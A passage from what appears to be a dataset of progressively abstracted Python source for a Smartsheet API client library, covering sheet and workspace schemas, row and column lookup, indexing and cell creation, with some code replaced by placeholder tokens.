read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass WorkspaceSchema(Schema):\n <assignment token>\n <assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the 